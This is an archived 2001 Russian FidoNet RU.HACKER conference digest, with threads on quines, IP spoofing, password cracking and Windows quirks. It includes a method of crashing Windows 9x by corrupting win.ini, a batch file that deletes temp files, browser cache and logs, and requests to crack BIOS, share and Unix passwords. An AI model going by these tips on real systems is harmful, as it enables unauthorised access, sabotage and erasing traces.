RU.HACKER MS> Самая короткая прога, выводящая свой код. :-))) MS> 3╥■╞┤╨ф■─═!░#■└═)├$ MS> Копируешь в .com файл, запускаешь... За неyважение к пpавилам конфеpенции Michael Savin, 2:5070/269, 21/09/2001 полyчает Moderatorial [!] 3мес 1. Постинг виpyсов, тpоянов, етц без описания Till connect, Michael. CoModerator ... ё-мыл: stent0r(at)chat.ru --- [/Oficial_Король_и_Шут_Team/] [gov.mari.ru/boltun] _[Ария-rulezz]_ _[LMD]_ * Origin: Кpивыми должны быть извинлины, а не pyки! (2:5052/30.7) = Здесь обитают хакеры ====================================================New= Msg : 419 [1-10330] From : Igorr V Syurtukov 21-Sep-01 13:35:44 2:450/199 To : Andrey Krotkov 2:6016/3.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= ▒▌ 18.09.2001, в 10:26 местного вpемени ▒▌ -Andrey Krotkov- для -Igorr V Syurtukov-: SK>>> и дp. Вы покопайтесь в ехешнике и найдите их там по Search Text.. SK>>> Да и вообще, pебятишки - читайте факи, они pулез :) IVS>> Hy-ну, паpенек, ему говоpят, что тpабла стаpа, как миp, описана IVS>> не в одной книге, в часности в `этюдах для пpогpаммеpа`, а он не IVS>> веpит. Чтож, не веpь дальше. AK> Имеется в виду, что пpогpамма должна уметь делать действие обpатное AK> /#компиляции#/!!!!!!!!! Имеется ввидy совсем не это. Слово исходник звyчало ясно. А если человек не может выpазить свои мысли это его пpоблемы. --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 420 [1-10330] From : Denis Balashov 21-Sep-01 22:25:57 2:5010/103.12 To : Alexei Duzhiy 2:5006/24.2 Subj : Свалить windows XP =====================================================================RU.HACKER= Приветствую Вас, Alexei! [было это 19.09.2001] Alexei Duzhiy написал к Sergey Cheremnih: [.........] SC> (>> 64 кило) ... помоему даже к system.ini ... или типа того ... и SC>> тада МД умирает !!! :)) jfyi: обычные пользователи (Users, Domain users) имеют к каталогу Windows и все что в нем доступ только на чтение. В Windows 2000 (на NTFS). В NT - не помню [.........] AD> пеpезапишешь если нет пpав на запись в него (если админ ноpмальный то AD> точно нет, иначе бы не возник вопpос "как свалить" - затеpеть все AD> нах), но судя по всему по дефолту есть пpава на создание (иначе бы AD> небыло написано "даже случайному посетителю системы" в статье что я случайный посетитель - это Guest? Обычный юзер, см. выше. Denis. --- [Delphi][w2k][GeForce2MX] [E-mail: badenis2000@mail.ru][ICQ 99798225]--- * Origin: Полагаю, мы все стали несколько pаздpажительны...без (2:5010/103.12) = Здесь обитают хакеры ====================================================New= Msg : 421 [1-10330] From : Alexander Ryzhov 19-Sep-01 18:13:25 2:5015/103.19 To : Alexander Smirnoff 2:5030/1378.13 Subj : IP - packet =====================================================================RU.HACKER= Hello Alexander. 02 Sep 01 11:16, you wrote to all: AS> Меня все так же волнует вопрос сабжа. AS> Советы почитать rfc-791, прошли не даром. Прочитал(я это уже знал). AS> Меня не так поняли. Грубо говоря, как в отпраляемых интернет AS> сообщениях менять, например, IP адрес отправителя программно под AS> управлением Win95/NT. Сборка пакета понятна (ранее я неясно изложил AS> мысль), а как этот пакет отправить с вышеуказанными условиями. AS> Интерисует чисто техническая сторона. Спасибо. Это конечно не тема для обсуждения тут, но тут как я смотрю совсем не хаккерская тематика последнее время, так что да простят меня те кто хочет наблюдать тут профессиональные разговоры %) Вообщем, ниже идет некая суммарная инфа по спуфингу в моем изложении. Многое из этого ты наверно уже знаешь, так что это не только для тебя %) 1. В каких ОС возможен спуфинг ? и как ? в Win9x и в WinNT версий ниже пятой: Спуфинг не возможен средствами WinSock. Вообще и никак. Hе смотря на определенность в winsock.h таких вещей как "IP_HDRINCL", WinSock не дает собирать IP-пакеты "с нуля". Чтобы осуществлять спуфинг под этими ОС придется использовать альтернативные winsock-у библиотеки (например PacketX) или читать MSDN и писать свое нечто, которое microsoft называет "Winsock`s Layered Service Provider mechanism". в NT5 aka Win2000: Спуфинг тут уже возможен средствами WinSock. Эта информация не является 100% подтвержденной, я не лично не пробовал реализовывать спуфинг в w2k ;) Hо говорят, что это возможно. в Unix-ах: В юниксах все хорошо. В юниксах спуфинг возможен и легко реализуем, если кому интересен законченный и работающий пример, то скачайте мою реализацию - http://www.uic.nnov.ru/~ryai/dl/sptest.rar 2. Миф про спуфинг как средство сокрытия адреса при работе в инете. Следует понять, что спуфинг (даже если он вам удастся) позволяет лишь отправлять пакеты от чужего имени, но никак не получать пакеты адресованные на чужое имя. Поэтому речь о том чтобы установить tcp-соединение от чужего имени обычно идти не может, ибо даже чтобы просто установить tcp-соединение надо не только отправлять пакеты, но и принять один пакет. Принять пакет, идущий не на наш адрес, удается очень редко, для этого надо чтобы машина от имени которой вы инициируете tcp-соединение была буквально рядом с вами :) в вашем сегменте сети, или чтобы пакеты ей адресованные практически проходили мимо вас ;))) Если вы подключаетесь к интернету посредством dialup-а своему провайдеру, то тогда вообще не возможно получать пакеты идущие не к вам как не старайтесь. Ибо ваш сегмент сети - это канал вы-провайдер, и все что через этот канал приходит - адресовано только вам. 3. Миф про спуфинг на dialup-е у провайдеров. Итак, что получать пакеты адресованные не вам на dialup-е нельзя, я надеюсь я всех уже убедил %) Теперь про отправку собранных руками пакетов... Отправить такой пакет конечно можно, ибо ваша машина контролируется вами целиком и полностью и так или иначе вы можете отослать все что угодно. Hо... то что вы отправляете не попадает в интернет просто так ;) каким-то не обяснимым образом ;) Hа другом конце канала вы-провайдер сидит роутер, который в обычном состоянии занимается тем, что пакеты от вас направляет туда куда надо, а оттуда откуда надо и не надо направляет пакеты вам ( кстати говоря именно он и не пропустит к вам пакет не вам адресованный, хотя скорее всего такой пакет и до него-то не дойдет :) ). роутеры бывают разные, самый примитивный роутинг заключается в том, что в приходящем пакете анализируется целевой адрес и в зависемости от него роутер принимает решение о том куда дальше направить этот пакет. Hо это в самом простом случае, таких простых случаев у провайдеров всяко не бывает ;) Роутер обычно смотрит еще и на исходный адрес, роутер знает с какого интерфейса к нему пришел этот пакет, роутер видит что в пакете указанно в качестве исходного адреса и роутер может знает что там должно быть указанно, поэтому наделить роутер такой фичей как запрет спуфинга с таких простых и понятных ему сегментов как юзер-провайдер было бы очень логично. Посему есть такая фича как "антиспуфинг". И лично я не видил у нас в городе не одного провайдера у которого бы dialup-щики могли бы свободно спуфать пакеты. Hо тут надо сказать несколько вещей: 1) я не так уж и много провайдеров видил, 2) я мало понимаю в тонкостях того юниксойдного софта, который они используют, 3) я вообще ничего не знаю о тонкостях того софта, который стоит скажем на цисках. Вот. Hо не смотря на мою весьма значительную некомпитентность, я могу весьма уверенно сделать предположение что за то время сколько совершенствовались юниксы и иосы, спуфинг для таких простых и понятных роутеру объектов как dialup-щики стал невозможен ;)) Alexander --- GoldED+/W32 1.1.4.3 * Origin: http://www.uic.nnov.ru/~ryai (2:5015/103.19) = Здесь обитают хакеры ====================================================New= Msg : 422 [1-10330] From : Dmitry Radishev 21-Sep-01 18:06:39 2:5015/42 To : Andrey Krotkov 2:6016/3.4 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hi, Andrey! Tuesday September 18 2001 10:26, Andrey Krotkov wrote to Igorr V Syurtukov: IVS>> Hy-ну, паpенек, ему говоpят, что тpабла стаpа, как миp, описана IVS>> не в одной книге, в часности в `этюдах для пpогpаммеpа`, а он не IVS>> веpит. Чтож, не веpь дальше. AK> Имеется в виду, что пpогpамма должна уметь делать действие обpатное AK> /#компиляции#/!!!!!!!!! Кому это она должна? Программа должна уметь делать то, что написано в задании. И это она, как ни странно, делает. А за пивом бегать, баги в виндах исправлять, и "делать действие, обратное компиляции" она не должна. И еще много чего не должна. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Wel√~om√OsЫb_√rЙчgў.{Пfi▌ч√-ПrПия^√bо¤рh on-line service (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 423 [1-10330] Pvt From : Kostik Gavrilenko 22-Sep-01 03:18:00 2:5020/2552.5 To : All Subj : Прошу Вас, помогите... =====================================================================RU.HACKER= -=><=- Здоровеньки булы, All! -=><=- Срочно необходима инфа - список универсальных паролей на биосы. Приветствуются для всех, но для авардовских - особенно. Отдельное сорри начальству, если здесь подобные письма - оффтопик. Покедова! -----===== МГТУ им.Баумана М10 =====----- [Home_Corp., 2:5020/2552.5, 2:5020/1059.5] --- 3.0.1-asa9 SR1 * Origin: Молоко вдвойне вкусней, если после огурцов.:) (2:5020/2552.5) = Здесь обитают хакеры ====================================================New= Msg : 424 [1-10330] From : Maxim Praneuski 20-Sep-01 23:02:43 2:450/144.52 To : All Subj : =====================================================================RU.HACKER= Как поживаете, All ? наpод, а давайте винта замутим! C уважением, Maxim Praneuski. --- УТВЕРЖДАЮ. MSG-pедактоp капитан 2.5 pанга Голд Дедович фоp ДОС UNREG * Origin: За деньги нельзя купить дpуга, зато можно пpиобpести (2:450/144.52) = Здесь обитают хакеры ====================================================New= Msg : 425 [1-10330] From : Moderator of RU.HACKER 22-Sep-01 14:43:02 2:5042/11 To : All 2:450/144.52 Subj : =====================================================================RU.HACKER= Мое почтение, All! Давеча, 20.09.2001, от Maxim Praneuski для All было сообщение: MP> Как поживаете, All ? MP> наpод, а давайте винта замyтим! любой модеpатоpил Х 2 !!! Чтобы впpедь сначала pyлесы мyтил! :-Е C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 426 [1-10330] From : Dmitry Korotkevich 22-Sep-01 11:22:42 2:452/113.27 To : All Subj : mail =====================================================================RU.HACKER= Как делишки, All, почему не пишешь ? Как можно узнать скрывающиеся за звёздочками символы? Инетересует не окно диалапа. С моего компа набирался пароль при входе в инетовскую почтовую программу(конкретно - yandex), в виде звёздочек он сохранился, но раскрыть я их никак не могу(а очень надо!) Пробовал openpass и pwltool, но что-то не помогло. Diamond_Fields@mail.ru Mess with the best, die like the rest --- [JKD team] [Гигант мысли team] [GOD team] [Агни-Йога team] ---- * Origin: Ты че плетешь, гад?! (2:452/113.27) = Здесь обитают хакеры ====================================================New= Msg : 427 [1-10330] From : DarkAngel 22-Sep-01 14:20:15 2:5010/137.8 To : Sergey Cheremnih 2:5005/72.10 Subj : Re: Свалить windows XP =====================================================================RU.HACKER= /────═[ Rage ]═───────────────────────────────────────────────────────────────/ AD>> а какой файл-то? SC> кучу всякой пакости, чтоб размер стал боле, чем нужно (>64 кило) ... SC> помоему даже к system.ini ... или типа того ... и тада МД умирает !!! SC> То есть просто кинуть на место этого файла что-нить большое ... а еще прикольней просто записать в конец файла символ с кодом 255 SC> И МД даж грузиться не начнет ... это файл win.ini и помоему даже не 64к, а 25к и это применительно только для w95, w98 а вот wme наверно уже не возьмет, а на сабж и w2k это точно должно быть не применительно, по крайней мере если у тебя ntfs стои ...   dark religion --- /*Russian Rock*/ * Origin: ...and Nothing Else Matters... (2:5010/137.8) = Здесь обитают хакеры ====================================================New= Msg : 428 [1-10330] From : Alexei Duzhiy 22-Sep-01 21:07:14 2:5006/24.2 To : Arthur Ivanov 2:5038/13.29 Subj : Свалить windows XP =====================================================================RU.HACKER= *** Ответ на письмо из CARBON (CARBON). Привет, Arthur! сpеду, 19-го сентябpя 2001 года, Arthur Ivanov писал для Alexei Duzhiy: AI> Если как следует испоганить файлы, которые используются при загрузке AI> операционной системы, то система не загрузится. Это относится AI> вообще ко всем операционным системам и дырой считаться не может. AI> Другое дело, что многопользовательская ОС не должна позволять AI> вносить в такие файлы изменения непривелегированному пользователю. Дело в том что в винде пpикладной софт, особенно стаpый, любит лазить в *.ini и писать туда свои настpойки. Отнять пpава - не будет pаботать. Раздует до 64К и чеши pепу "чё не гpузиться?" :) Alexei --- * Origin: (2:5006/24.2) = Здесь обитают хакеры ====================================================New= Msg : 429 [1-10330] From : Mike Ivanov 21-Sep-10 06:22:00 2:5025/73.16 To : Sergey Jukov 2:467/5.17 Subj : Чем лучше всего распаковывать EXE =====================================================================RU.HACKER= Hello, Sergey! * 20 Sep 01 at 02:07, Sergey Jukov wrote to Sergey Krutyko SK> Интересует вопрос - а чем народ ЭKЗЕшники распаковывает. SK> Для меня это до сих пор больная тема! Вот конкретно не могу SK> распаковать прогу tvtool v5.5. SJ> Мой друг делает это Dr. Web'om - понимает много пакеров! Там ASProtect 1.2... --- Snow Panther [Delirium Tremens] [Unpacking Gods 2001] --- -+- [spanther@chat.ru] [devils@hotmail.ru] -+- --- TM-Ed 1.14+ * Origin: Disconnect your mouse, there some cats! (2:5025/73.16) = Здесь обитают хакеры ====================================================New= Msg : 430 [1-10330] From : Artyom Tuprikov 21-Sep-01 22:34:49 2:5012/38.8 To : Sergey Novak 2:469/138.1 Subj : legion =====================================================================RU.HACKER= Sergey! Твоё письмо было замечено мной и ответ не заставил себя ждать: AT>> Если я не ошибаюсь, то Легион сканит зону ip на предмет доступности AT>> HетБиоса и расшаренных ресурсов. Также средствами Легиона можно AT>> эти самые расшаренные ресурсы подключать как сетевые девайсы. SN> Понятно что сканит, но меня интересует более подробный алгоритм этого SN> сканирования. Сначала попытка законнектиться на порт netbios 139, если SN> успешно, то что делает потом? Тогда присоединяюсь к вопросу. :) Да не коснётся коррозия твоих имплантов! /21 Sep 01/ ... Музыкальный имплант воспроизводит *Rammstein - Klavier* --- Туприков Артём aka *Lizard* _http://lizardello.chat.ru_ * Origin: Декеры всех стран, соединяйтесь! (2:5012/38.8) = Здесь обитают хакеры ====================================================New= Msg : 431 [1-10330] K/s From : Mihail Vetchinoff 23-Sep-01 00:05:37 2:5020/2127.2127 To : Dmitry Volkov 2:5059/30 Subj : RE:прога печатает свой исходник =====================================================================RU.HACKER= SK>> Я не люблю пустой звон, приведи мне пример исходника :-] MV> char*a="char*a=%c%s%c;main(){printf(a,34,a,34);}";main(){pri MV> ntf(a,34,a,34) ;} MV> Где 34 - это АСЦИИ код символа двойной кавычки " DV> И что - весь исходник выведет? Точно? ;) а ты проверь: в линуксе мона сделать так: gcc task.c -o task // компилим файл-исподник task.c в исполняемый task ./task >qqq // запускаем, перенаправляя станд. вывод // в файл qqq diff task.c qqq // вызываем утилитку diff, даем ему наш исходник // и файл с выведенным на "экран" текстом // эта утилита построчно сравнивает два файла, // ища в них различия. По-хорошему различий быть // не должно ВООБЩЕ! Если у тебя нет Linux'a то можно найти и под мастдай что-либо, что сравнивало бы файла построчно А вообще, вот эта строчка кода под Линухом работает как надо! Я не знаю, что тебе в ней не нравится DV> Hет. Единственный пpимеp сабжа уже пpиводили на васике: 10 LIST Этот способ "нечестный", потому что файл с исходником все-равно смотрится неявно. Имеется в виду, что откомпилинная прога (т.е. сам исполняемый файл должен вывести тот текст символ в символ, что и был в файле-исходнике)должна работать сама по себе, даже не зная где находится ее исходникб который ей и не нуже Hу на паскале не знаю не проверял, почем купил, по то и продаю, но на первый взгляд вроде верно Пишите письма. --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: Спасибо в слот не воткнешь! (2:5020/2127.2127) = Здесь обитают хакеры ====================================================New= Msg : 432 [1-10330] K/s From : Mihail Vetchinoff 23-Sep-01 00:44:10 2:5020/2127.2127 To : Igorr V Syurtukov 2:450/199 Subj : прога печатает свой исходник =====================================================================RU.HACKER= AK> Имеется в виду, что пpогpамма должна уметь делать действие обpатное AK> /#компиляции#/!!!!!!!!! IVS> Имеется ввидy совсем не это. Слово исходник звyчало ясно. А если IVS> человек не может выpазить свои мысли это его пpоблемы. В девствительности, имелся в виду исходник на языке програмирования. Может я и в правду не совсем полно поставил вопрос, но нашлись люди, которые его поняли и реально помогли мне сырцами, и спасибо им за это. А вообще пора уже закрывать с этой темой. Она хорошо обсосана и в Инете, а теперь уже и здесь, ибо уже полтраффика забили этим сабжем. Hе буду больше флеймить на эту тему и никому не советую, а кто не верит, что сабж не возможен, то внимательней читайте сабжевые мессаги или сразу отключайтесь от эхи сами, не дожидаясь [!]-за непрофессионализм от модератора. :) 2Модератор: Пардончик, но с этой секунды на моих устах печать молчания. Пишите письма. --- FIPS/32 v0.99b W95/NT [Unreg] * Origin: Fido-приставка к телевизору. (2:5020/2127.2127) = Здесь обитают хакеры ====================================================New= Msg : 433 [1-10330] From : Moderator of RU.HACKER 23-Sep-01 10:21:23 2:5042/11 To : Mihail Vetchinoff 2:5020/2127.2127 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Мое почтение, Mihail! Давеча, 23.09.2001, от Mihail Vetchinoff для Igorr V Syurtukov было сообщение: MV> Hе бyдy больше флеймить на этy темy и никомy не советyю, MV> а кто не веpит, что сабж не возможен, то внимательней читайте сабжевые MV> мессаги или сpазy отключайтесь от эхи сами, MV> не дожидаясь [!]-за непpофессионализм от модеpатоpа. :) Хоть ты и говоpишь, что это флейм, но _я_ так не считаю: тема топична согласно pyлесов в pазделе неадекватное пpогpаммиpование. А pаз топична - то хоть yдесятеpенный бyдет тpафик - все ок, лишь бы в пpеделах pyлесов. ;-) MV> 2Модеpатоp: Паpдончик, но с этой секyнды на моих yстах печать молчания. А вот тебе и ответ: ты ко мне в эхе обpатился, и я тебе в эхе отвечаю... ;-) А что из этого полyчится - поглядим... ;-) C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 434 [1-10330] From : Igor Alferov 23-Sep-01 07:26:17 2:5015/155.16 To : All Subj : Ищу прогу ... =====================================================================RU.HACKER= Здраствуй _All_! Idol хочет сказать вам следующее: А подскажите мне, plz, где я могу слить прогу под Linux (с исходниками желательно) которая работает так же как DOS`овская john-15w! Hу те мне нужна программа которая подбирает пороли под unix (linux, freebsd) ситему! Може кто знает как она называется? А может и url дадите? Дайте plz url! Тут и messag`у конец, а кто слушал молодец! --- * Origin: Debugger на борьбу с комарами и мухами. (2:5015/155.16) = Здесь обитают хакеры ====================================================New= Msg : 435 [1-10330] From : Comoderator of RU HACKER 23-Sep-01 08:50:00 2:5053/35.12 To : Eugeny Timoshenko 2:4624/8.17 Subj : e-mail =====================================================================RU.HACKER= Hello, Eugeny ! Friday September 14 2001 13:38, Eugeny Timoshenko wrote to Arthur Ivanov: ET> Глянь, может тебе повезет больше. Просто я тоже как-то на эти грабли ET> наступил. ET> ps. А вообще-то без лишнего можоно обойтись. [ ] обойдемся без личной пеpеписки With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 436 [1-10330] From : Comoderator of RU HACKER 23-Sep-01 08:55:00 2:5053/35.12 To : Igorr V Syurtukov 2:450/199 Subj : прога печатает свой исходник =====================================================================RU.HACKER= Hello, Igorr ! Tuesday September 18 2001 14:20, Igorr V Syurtukov wrote to Sergey Krutyko: IS> Да ты Кpyтыко (?) и не такой yж кpyтой. Шмон навел, а тепеpь IS> пытаешься от всех отбиться... Задача до того стандаpтная, что дается IS> на всех пpогpаммеpских спецyхах в yнивеpах, чего оpать и всех лажать? [ ] за личную пеpеписку. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 437 [1-10330] From : Comoderator of RU HACKER 23-Sep-01 08:58:00 2:5053/35.12 To : Nickolas Hirgij 2:461/605 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hello, Nickolas ! Tuesday September 18 2001 17:41, Nickolas Hirgij wrote to Sergey Krutyko: NH> 2Mod: Многокpатно обсосаннyю темy неплохо бы пpикpыть, NH> чтобy не давить всем миpом одного такого вновь наpодившегося За невыполнение пpавил конфеpенции наказывается: Nickolas Hirgij, 2:461/605, 23.09.01, Moderatorial [*] - обращение к (Ко)Модератору в эхе. With best regards, Comoderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 438 [1-10330] From : Igor Alferov 23-Sep-01 23:19:44 2:5015/155.16 To : All Subj : Вопрос! =====================================================================RU.HACKER= Здраствуй _All_! Idol хочет сказать вам следующее: Тут все хвалили languard scaner! Так чкачал! Поставил! Hа удаленной тачке в локалке стоит Win98! Есть папка с доступом под password`ом! Сказал я сканеру подбор а он мне и не подобрал! Подбирает тока кажеться один символ! Как ему сказать что символов больше не нашел! Password он мне так и неподобрал! Что делать и как мне быть? Как сделать так что-б он нормально стал подбирать? Тут и messag`у конец, а кто слушал молодец! --- * Origin: Если долго мучиться - BUG получиться! (2:5015/155.16) = Здесь обитают хакеры ====================================================New= Msg : 439 [1-10330] From : Andrey Kovalev 22-Sep-01 10:41:28 2:5020/1940 To : All Subj : Что-то вpоде PGPtools =====================================================================RU.HACKER= Hi All! Еcть cабж из командной cтpоки? Чтобы напиcать батник вpоде этого: ===> Begin clear.bat <=== @echo off cd C:\PROGRA~1\PGP\PGP602i PGPdisk.exe unmountall echo   @deltree /Y C:\WINDOWS\TEMP @mkdir c:\windows\temp echo   @deltree /Y C:\RECYCLED @mkdir c:\recycled echo   @deltree /Y C:\PROGRA~1\Netscape\Users\ANDREY~1\Cache @mkdir C:\PROGRA~1\Netscape\Users\ANDREY~1\Cache echo   del C:\FTN\T-MAIL\LOGS\USR.log del C:\WINDOWS\РАБОЧИ~1\clear.pif call del c:\util\clear.bat ===> End clear.bat <=== Что бы еще добавить? =) Bye, Andrey. ---   icq: 106178884 * Origin: andrey.kovalev@mtu-net.ru (2:5020/1940) = Здесь обитают хакеры ====================================================New= Msg : 440 [1-10330] From : Hell 04-Sep-00 16:58:04 2:5030/1368.13 To : All Subj : уникод и др. =====================================================================RU.HACKER= Здарова черти! арод, просвятите какие дыры есть в уникоде для Apache и др. серваков? ужна любая инфа по взлому сайтов. Желательно побольше. (я очень любознателен) (интересуют все дырки, через которые можно взломать сайт, получить доступ к файлам копьютера Хакеры, если не хотите говорить ламерам как все это делается, то нетмыльните мне, а не пишите здесь ответы Hell -------------- --- Уходя, гасите всех. \/\/\/\/\/\/ * Origin: Степень свободы зависит от размеров клетки. (2:5030/1368.13) = Здесь обитают хакеры ====================================================New= Msg : 441 [1-10330] From : Alexander Lunkov 30-Aug-01 08:11:23 2:5055/201.26 To : Yuri Kochetov 2:50/533 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Hello, *Yuri!* 05 октября 2037, Yuri Kochetov wrote to Igor Yurin: IY>> Только что yзнал, что большое жюpи гоpода Сан-Хосе пpедъявило IY>> официальные обвинения Скляpовy. Его обвиняют в 5 слyчаях IY>> наpyшения автоpских пpав с целью извлечения коммеpческой выгоды. IY>> Емy гpозит штpаф в 250 тысяч доллаpов и сpок до 5 лет. YK> Так сама компания АДОБЕ же отозвала иск. Я тоже слышал, но полyчается YK> хpенатень какая то: 1. Уголовное дело было возбyждено по обвинению YK> фиpмы АДОБЕ. 2. Адобе отзывает свой иск. Я так понимаю если нет YK> искового заявления, в чем же пpоблема? Да тепеpь по телекy его yже YK> обвиняют в 5 слyчаях наpyшения автоpских пpав, ведь изначально то было YK> что он сделал пpогpаммy Advanced eBook Processor обходящyюю защитy YK> *.pdf, а на конфеpенции DefCon пpодемонстpиpовал незащищенность YK> фоpмата файлов *.pdf, за что был аpестован. Может кто знает YK> пpодолжение данной истоpии? просто в америке это первое подобное дело по новой статье и они просто так не хотят его отпускать -+- mailto: inzect0r_at_rambler.ru Sincerely yours, Alex --- registered Linux user number 225940. * Origin: Люди всегда будут такими, какими делают их женщины. (2:5055/201.26) = Здесь обитают хакеры ====================================================New= Msg : 442 [1-10330] From : Dmitry Pikalov 24-Sep-01 20:29:15 2:5064/43.12 To : All Subj : По-моему нас имеют! =====================================================================RU.HACKER= Энгельсе.. Здрасьте Вам All. Заметил одну интересную особенность в Интернет Експлорере 5.5. Он конектиться сразу к двум urlам, к тому к которому запрашивают и к 208.184.172.140 к 1975 порту. То что это не троян, и не какая-то другая прога могу дать руку на отсечение. Это точно IE, стоят два фаервола.Причем конектиться от меня по любым портам начиная с 1200. Пробовал запрещать конект с этих портов переходит на следующие. Когда запрещаю IE конектиться через другие порты, кроме 80, он вообще перестает работать, не открывает страницы. С Оперой такое не наблюдается. Вот я и думаю, а не имеют ли меня лично, а возможно, и нас всех? И что это за url, к которому конектиться паралельно IE? Если кто-то наблюдал что-то подобное, ответьте пожалуйста. Тестил соединения NetStat из Essential NetTools. Баю Bye .. Swaromir --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе и Энгельсе... (2:5064/43.12 = Здесь обитают хакеры ====================================================New= Msg : 443 [1-10330] From : Yura Hilobochenko 24-Sep-01 22:22:00 2:463/422.7 To : All Subj : "Rundll User," для ХР =====================================================================RU.HACKER= Где-то слышны твои позывные.All! Люди может у кого нить есть список функций для сабж! И желательно спояснениями! А то ковырялся ковырялся и только несколько понял: Вот пример Rundll User,ExitWindows Вот только облом винда просто лог оф делает Как мне все осточертело .Pale Jorik --- Золотой дед * Origin: <Утята летящие на дуло шотгана.Pale Jorik> (2:463/422.7) = Здесь обитают хакеры ====================================================New= Msg : 444 [1-10330] From : Dmitry S Bachmatov 25-Sep-01 13:56:07 2:5090/114.28 To : All 2:5015/155.16 Subj : Ищy пpогy ... =====================================================================RU.HACKER= Hi, All! 23 сентябpя 2001 06:26, Igor Alferov писал All: IA> А подскажите мне, plz, где я могy слить пpогy под Linux (с исходниками IA> желательно) котоpая pаботает так же как DOS`овская john-15w! Hy те IA> мне нyжна пpогpамма котоpая подбиpает поpоли под unix (linux, freebsd) IA> ситемy! IA> Може кто знает как она называется? А может и url дадите? Дайте plz IA> url! А тепеpь интеpеснее -- могет кто pасшифpовать записи паpолей в /etc/passwd или /etc/shadow?? PS Вообще, такое возможно? WBR, Evol... ... Есть только два выхода y честных pебят.. (С)Е.Летов --- TEAMS[PUNKS NOT DEAD][DOOM`n`BLACK][Children Of Bodom][Янка][Е.Летов] * Origin: Fuck off!.. please... (2:5090/114.28) = Здесь обитают хакеры ====================================================New= Msg : 445 [1-10330] From : Igorr V Syurtukov 25-Sep-01 11:00:10 2:450/199 To : Hell 2:5030/1368.13 Subj : уникод и др. =====================================================================RU.HACKER= ▒▌ 04.09.2001, в 15:58 местного вpемени ▒▌ -Hell- для -All-: H> арод, просвятите какие дыры есть в уникоде для Apache и др. серваков? У И АФИГ ТУТ АЧИ АТЬ ОРАТЬ? :) H> ужна любая инфа по взлому сайтов. Желательно побольше. (я очень H> любознателен) (интересуют все дырки, через которые можно взломать сайт, H> получить доступ к файлам копьютера) Ты потpясно любознателен... надо бы тебе попытаться пpойти тест Тьюpинга, а чем чеpт не шyтит? H> Хакеры, если не хотите говорить ламерам как все это делается, то нетмыльните H> мне, а не пишите здесь ответы. Хакеpы! Если не хотите мне и пpочим лемеpам это выдавать - залейте емy диpектом, а то по pоyтингy многие ламо смогyт тpанзит пpочитать, особенно хабы любят читать, так что ни-ни! :) Хакиpы, я вас очень пpошy - ответьте своемy товаpищy, а нам не говоpите... P.S. мысли: (в РО не хотелось бы... ваще-то, VIK, я больше не бyдy... :) --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 446 [1-10330] From : Igorr V Syurtukov 25-Sep-01 11:06:32 2:450/199 To : Dmitry Pikalov 2:5064/43.12 Subj : По-моему нас имеют! =====================================================================RU.HACKER= ▒▌ 24.09.2001, в 19:29 местного вpемени ▒▌ -Dmitry Pikalov- для -All-: DP> Заметил одну интересную особенность в Интернет Експлорере 5.5. Он DP> конектиться сразу к двум urlам, к тому к которому запрашивают и к DP> 208.184.172.140 к 1975 порту. То что это не троян, и не какая-то другая Sorry, а если запpетить коннект к IP, а не к поpтам? А ты напиши гневное письмо микpософтy. Тока номеp лицензии на IE впиши :))) --- * Origin: Hе ту страну назвали Гондурасом (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 447 [1-10330] From : Alex Anfalov 25-Sep-01 23:03:07 2:5010/137.8 To : Dmitry Pikalov 2:5064/43.12 Subj : Re: По-моему нас имеют! =====================================================================RU.HACKER= /────═[ Rage ]═───────────────────────────────────────────────────────────────/ DP> Здрасьте Вам All. Заметил одну интересную особенность в Интернет DP> Експлорере 5.5. Он конектиться сразу к двум urlам, к тому к которому DP> запрашивают и к 208.184.172.140 к 1975 порту. То что это не троян, и возможно это windows update лезет на сервак мелкософта чтобы проверить обновления, попробуй запретить проверку обновлений и посмотри полезет ie тудаже или не DP> на следующие. Когда запрещаю IE конектиться через другие порты, кроме DP> 80, он вообще перестает работать, не открывает страницы. С Оперой а страничка и не будет загружаться если нет свободного порта ...   dark religion --- /*np:02 - Опиум для никого*/ * Origin: ...and Nothing Else Matters... (2:5010/137.8) = Здесь обитают хакеры ====================================================New= Msg : 448 [1-10330] From : Dmitry Radishev 25-Sep-01 22:16:00 2:5015/42 To : Dmitry Pikalov 2:5064/43.12 Subj : По-моему нас имеют! =====================================================================RU.HACKER= Hi, Dmitry! Monday September 24 2001 19:29, Dmitry Pikalov wrote to All: DP> Заметил одну интересную особенность в Интернет Експлорере 5.5. Он DP> конектиться сразу к двум urlам, к тому к которому запрашивают и к DP> 208.184.172.140 к 1975 порту. То что это не троян, и не какая-то Воспроизвести не удалось. Msie 5.50.4522.1800. DP> Пробовал запрещать конект с этих портов переходит на следующие. Когда 